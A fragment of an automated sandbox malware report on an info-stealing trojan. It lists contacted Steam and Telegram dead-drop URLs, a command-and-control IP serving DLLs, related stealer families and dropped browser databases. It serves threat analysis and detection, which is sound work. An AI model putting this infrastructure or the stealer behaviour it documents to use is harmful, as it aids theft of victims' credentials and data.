                                                                                                  https://steamcommunity.com/my/wishlist/Spice.pif, 0000000B.00000002.2620952300.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drfalse
                                                                                                    high
                                                                                                    https://t.me/Spice.pif, 0000000B.00000003.2179892773.00000000016C9000.00000004.00000020.00020000.00000000.sdmp, Spice.pif, 0000000B.00000003.2180038050.0000000001821000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000003.2180269405.00000000017C8000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000003.2180478356.0000000001821000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000003.2180335897.00000000017C9000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000003.2180269405.00000000017A1000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000003.2179949168.00000000016C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://t.me/snsb82AtSpice.pif, 0000000B.00000003.2180401342.000000000481B000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.0000000004811000.00000040.00001000.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2621375005.0000000001820000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000003.2180158067.0000000001A10000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2621300072.00000000017A0000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2621187844.0000000001751000.00000004.00000020.00020000.00000000.sdmp, Spice.pif, 0000000B.00000003.2180218902.00000000016C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://37.27.87.155/;Spice.pif, 0000000B.00000002.2621699873.0000000001A3C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drfalse
                                                                                                          high
                                                                                                          https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=EyWBqDQS-6Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drfalse
                                                                                                            high
                                                                                                            https://help.steampowered.com/en/Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drfalse
                                                                                                              high
                                                                                                              https://steamcommunity.com/market/Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drfalse
                                                                                                                high
                                                                                                                https://store.steampowered.com/news/Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drfalse
                                                                                                                  high
                                                                                                                  https://37.27.87.155/freebl3.dll(eSpice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=PyuRtGtUpR0t&amp;l=englisSpice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drfalse
                                                                                                                    high
                                                                                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=DGDAEHCB.11.drfalse
                                                                                                                      high
                                                                                                                      http://store.steampowered.com/subscriber_agreement/Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drfalse
                                                                                                                        high
                                                                                                                        https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drfalse
                                                                                                                          high
                                                                                                                          https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgSpice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drfalse
                                                                                                                            high
                                                                                                                            https://steamcommunity.com/discussions/Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drfalse
                                                                                                                              high
                                                                                                                              https://steamcommunity.com/OSpice.pif, 0000000B.00000002.2620952300.00000000016B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://store.steampowered.com/stats/Spice.pif, 0000000B.00000002.2620952300.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drfalse
                                                                                                                                  high
                                                                                                                                  https://37.27.87.155CAKJESpice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  low
                                                                                                                                  https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&ampSpice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drfalse
                                                                                                                                    high
                                                                                                                                    https://store.steampowered.com/steam_refunds/Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drfalse
                                                                                                                                      high
                                                                                                                                      https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gifSpice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drfalse
                                                                                                                                        high
                                                                                                                                        https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?vSpice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drfalse
                                                                                                                                          high
                                                                                                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchDGDAEHCB.11.drfalse
                                                                                                                                            high
                                                                                                                                            https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pSpice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drfalse
                                                                                                                                              high
                                                                                                                                              https://steamcommunity.com/workshop/Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drfalse
                                                                                                                                                high
                                                                                                                                                https://store.steampowered.com/legal/Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://t.me/snsb82Spice.pif, 0000000B.00000003.2180401342.000000000481B000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.0000000004811000.00000040.00001000.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2621375005.0000000001820000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000003.2180158067.0000000001A10000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2621300072.00000000017A0000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2621187844.0000000001751000.00000004.00000020.00020000.00000000.sdmp, Spice.pif, 0000000B.00000003.2180218902.00000000016C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://www.sqlite.org/copyright.html.Spice.pif, 0000000B.00000002.2627170786.000000001024D000.00000002.00001000.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2623868667.0000000006EE2000.00000004.00000800.00020000.00000000.sdmp, sqln[1].dll.11.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&amp;l=englSpice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&amp;l=76561199677575543[1].htm.11.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&amp;l=enSpice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icoDGDAEHCB.11.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://37.27.87.155/oSpice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://37.27.87.155/pSpice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&amp;l=english&amSpice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://37.27.87.155KKKEHSpice.pif, 0000000B.00000002.2622802244.0000000004981000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                low
                                                                                                                                                                https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&amp;l=engliSpice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://recaptcha.netSpice.pif, 0000000B.00000002.2621187844.0000000001790000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                  unknown
                                                                                                                                                                  https://37.27.87.15576561199677575543[1].htm.11.drfalse
                                                                                                                                                                  • 11%, Virustotal, Browse
                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                  unknown
                                                                                                                                                                  https://store.steampowered.com/76561199677575543[1].htm.11.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://37.27.87.155FBGIIIEBGDGDAKJKKKEBition:Spice.pif, 0000000B.00000002.2622802244.0000000004981000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    low
                                                                                                                                                                    https://steamcommunity.com/profiles/76561199677575543jSpice.pif, 0000000B.00000002.2620952300.00000000016B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://ac.ecosia.org/autocomplete?q=DGDAEHCB.11.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1Spice.pif, 0000000B.00000002.2620952300.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drfalse
                                                                                                                                                                          high
                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                          • 75% < No. of IPs
                                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                          37.27.87.155
                                                                                                                                                                          unknownIran (ISLAMIC Republic Of)
                                                                                                                                                                          39232UNINETAZfalse
                                                                                                                                                                          23.7.115.52
                                                                                                                                                                          steamcommunity.comUnited States
                                                                                                                                                                          14080TelmexColombiaSACOfalse
                                                                                                                                                                          IP
                                                                                                                                                                          127.0.0.1
                                                                                                                                                                          Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                                                                          Analysis ID:1433839
                                                                                                                                                                          Start date and time:2024-04-30 07:41:35 +02:00
                                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                                          Overall analysis duration:0h 8m 6s
                                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                                          Report type:full
                                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                          Number of analysed new started processes analysed:19
                                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                                          Technologies:
                                                                                                                                                                          • HCA enabled
                                                                                                                                                                          • EGA enabled
                                                                                                                                                                          • AMSI enabled
                                                                                                                                                                          Analysis Mode:default
                                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                                          Sample name:0dN59ZIkEM.exe
                                                                                                                                                                          renamed because original name is a hash value
                                                                                                                                                                          Original Sample Name:1a6e4128750535604181321ce27c3084.exe
                                                                                                                                                                          Detection:MAL
                                                                                                                                                                          Classification:mal100.troj.spyw.evad.winEXE@22/39@2/3
                                                                                                                                                                          EGA Information:
                                                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                                                          HCA Information:
                                                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                                                          • Number of executed functions: 100
                                                                                                                                                                          • Number of non-executed functions: 292
                                                                                                                                                                          Cookbook Comments:
                                                                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                          • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                          • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                          TimeTypeDescription
                                                                                                                                                                          07:43:12API Interceptor271x Sleep call for process: Spice.pif modified
                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                          37.27.87.155file.exeGet hashmaliciousLummaC, PureLog Stealer, RedLine, RisePro Stealer, Vidar, zgRATBrowse
                                                                                                                                                                            file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                              file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                    qk9TaBBxh8.exeGet hashmaliciousLummaC, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoaderBrowse
                                                                                                                                                                                      file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                        SecuriteInfo.com.Win64.Evo-gen.32634.31069.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                                                                                                                                                                                          file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                            steamcommunity.comfile.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                            • 23.210.138.105
                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, PureLog Stealer, RedLine, RisePro Stealer, Vidar, zgRATBrowse
                                                                                                                                                                                            • 23.210.138.105
                                                                                                                                                                                            file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                            • 23.210.138.105
                                                                                                                                                                                            file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                            • 104.105.90.131
                                                                                                                                                                                            file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                            • 104.108.99.20
                                                                                                                                                                                            file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                            • 104.108.99.20
                                                                                                                                                                                            file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                            • 104.102.129.112
                                                                                                                                                                                            file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                            • 23.194.234.100
                                                                                                                                                                                            file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                            • 23.194.234.100
                                                                                                                                                                                            lzShU2RYJa.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                                                                                                            • 96.17.209.196
                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                            UNINETAZfile.exeGet hashmaliciousLummaC, PureLog Stealer, RedLine, RisePro Stealer, Vidar, zgRATBrowse
                                                                                                                                                                                            • 37.27.87.155
                                                                                                                                                                                            file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                            • 37.27.87.155
                                                                                                                                                                                            file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                            • 37.27.87.155
                                                                                                                                                                                            SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                                                                                                                                                                            • 37.27.87.155
                                                                                                                                                                                            file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                            • 37.27.87.155
                                                                                                                                                                                            qk9TaBBxh8.exeGet hashmaliciousLummaC, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoaderBrowse
                                                                                                                                                                                            • 37.27.87.155
                                                                                                                                                                                            file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                            • 37.27.87.155
                                                                                                                                                                                            SecuriteInfo.com.Win64.Evo-gen.32634.31069.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                                                                                                                                                                                            • 37.27.87.155
                                                                                                                                                                                            file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                            • 37.27.87.155
                                                                                                                                                                                            4XAsw9FSr5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 37.27.255.7
                                                                                                                                                                                            TelmexColombiaSACOLfI5pQnZBu.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                            • 190.143.63.115
                                                                                                                                                                                            f8txrlLgsG.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                            • 186.87.153.47
                                                                                                                                                                                            98zdN8lGtk.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 181.49.145.239
                                                                                                                                                                                            8cys6Vklwy.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 181.57.212.129
                                                                                                                                                                                            sora.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                            • 181.62.19.144
                                                                                                                                                                                            sora.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                            • 190.85.145.166
                                                                                                                                                                                            3P4acRdms1.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                            • 190.143.63.102
                                                                                                                                                                                            x1b5bmJgLm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 186.86.44.84
                                                                                                                                                                                            ZcOjro0Chh.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                            • 181.54.154.16
                                                                                                                                                                                            dwn1cGHIbV.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                            • 181.61.167.31
                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                            51c64c77e60f3980eea90869b68c58a8file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                            • 37.27.87.155
                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, PureLog Stealer, RedLine, RisePro Stealer, Vidar, zgRATBrowse
                                                                                                                                                                                            • 37.27.87.155
                                                                                                                                                                                            SecuriteInfo.com.Win32.DropperX-gen.990.17898.exeGet hashmaliciousCobaltStrikeBrowse
                                                                                                                                                                                            • 37.27.87.155
                                                                                                                                                                                            SecuriteInfo.com.Win32.DropperX-gen.990.17898.exeGet hashmaliciousCobaltStrikeBrowse
                                                                                                                                                                                            • 37.27.87.155
                                                                                                                                                                                            file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                            • 37.27.87.155
                                                                                                                                                                                            file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                            • 37.27.87.155
                                                                                                                                                                                            sdfYc98GO4.exeGet hashmaliciousCobaltStrikeBrowse
                                                                                                                                                                                            • 37.27.87.155
                                                                                                                                                                                            file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                            • 37.27.87.155
                                                                                                                                                                                            file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                            • 37.27.87.155
                                                                                                                                                                                            file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                            • 37.27.87.155
                                                                                                                                                                                            37f463bf4616ecd445d4a1937da06e19T0gjOTzwJb.exeGet hashmaliciousDjvuBrowse
                                                                                                                                                                                            • 23.7.115.52
                                                                                                                                                                                            34cFFMVY3B.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                            • 23.7.115.52
                                                                                                                                                                                            file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                            • 23.7.115.52
                                                                                                                                                                                            z39103_PN-EN-1090-1_A1_2012P.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                                            • 23.7.115.52
                                                                                                                                                                                            rCW_00402902400429.batGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                            • 23.7.115.52
                                                                                                                                                                                            z6FORMATOPROVEEDORESMETAX.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                                            • 23.7.115.52
                                                                                                                                                                                            z77EU17439-FT-MILKYLUXGOUDAMILD.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                                            • 23.7.115.52
                                                                                                                                                                                            beta.dll.dllGet hashmaliciousLatrodectusBrowse
                                                                                                                                                                                            • 23.7.115.52
                                                                                                                                                                                            Document_g55_79a057639-91h49176a6220-1759n0.jsGet hashmaliciousLatrodectusBrowse
                                                                                                                                                                                            • 23.7.115.52
                                                                                                                                                                                            bim.msiGet hashmaliciousLatrodectusBrowse
                                                                                                                                                                                            • 23.7.115.52
                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                            C:\ProgramData\HCAEGCBFHJDG\mozglue.dll34cFFMVY3B.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                              file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                  HFtuDDkdi6.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                    A4eSWqbQPf.exeGet hashmaliciousMars Stealer, RedLine, SectopRAT, Stealc, VidarBrowse
                                                                                                                                                                                                      N3MZMKV5GN.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                        nJGNa9kHJf.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                          7PFj8ZyNTr.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                            HpsVE4Pwxn.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                              u7p2rff5aP.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                C:\ProgramData\HCAEGCBFHJDG\freebl3.dll34cFFMVY3B.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                    file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                      HFtuDDkdi6.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                        A4eSWqbQPf.exeGet hashmaliciousMars Stealer, RedLine, SectopRAT, Stealc, VidarBrowse
                                                                                                                                                                                                                          N3MZMKV5GN.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                            nJGNa9kHJf.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                              7PFj8ZyNTr.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                HpsVE4Pwxn.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                  u7p2rff5aP.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif
                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):20480
                                                                                                                                                                                                                                    Entropy (8bit):0.8475592208333753
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBOF30AvJ3qj/880C4pwE1:TeAFawNLopFgU10XJBORJ6px4p7
                                                                                                                                                                                                                                    MD5:BE99679A2B018331EACD3A1B680E3757
                                                                                                                                                                                                                                    SHA1:6E6732E173C91B0C3287AB4B161FE3676D33449A
                                                                                                                                                                                                                                    SHA-256:C382A020682EDEE086FBC56D11E70214964D39318774A19B184672E9FD0DD3E0
                                                                                                                                                                                                                                    SHA-512:9CFE1932522109D73602A342A15B7326A3E267B77FFF0FC6937B6DD35A054BF4C10ED79D34CA38D56330A5B325E08D8AFC786A8514C59ABB896864698B6DE099
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif
                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                    Category:dropped
